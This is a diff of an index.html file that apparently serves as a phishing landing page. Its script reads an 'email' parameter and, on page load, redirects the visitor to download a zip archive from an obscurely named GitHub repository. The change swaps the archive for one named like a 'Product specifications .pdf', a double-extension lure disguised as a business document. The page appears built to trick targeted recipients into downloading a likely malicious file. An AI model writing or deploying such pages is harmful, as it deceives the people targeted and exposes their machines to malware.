--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
-window.location.href = `https://github.com/ttrrtrterdddd/fdseet/raw/refs/heads/main/Primary%20Metals.zip`;</script>
+window.location.href = `https://github.com/ttrrtrterdddd/dfe/raw/refs/heads/main/K%20%20ZAKLAD%20Consulting%20Product%20specifications%20.pdf%20%20.zip`;</script>
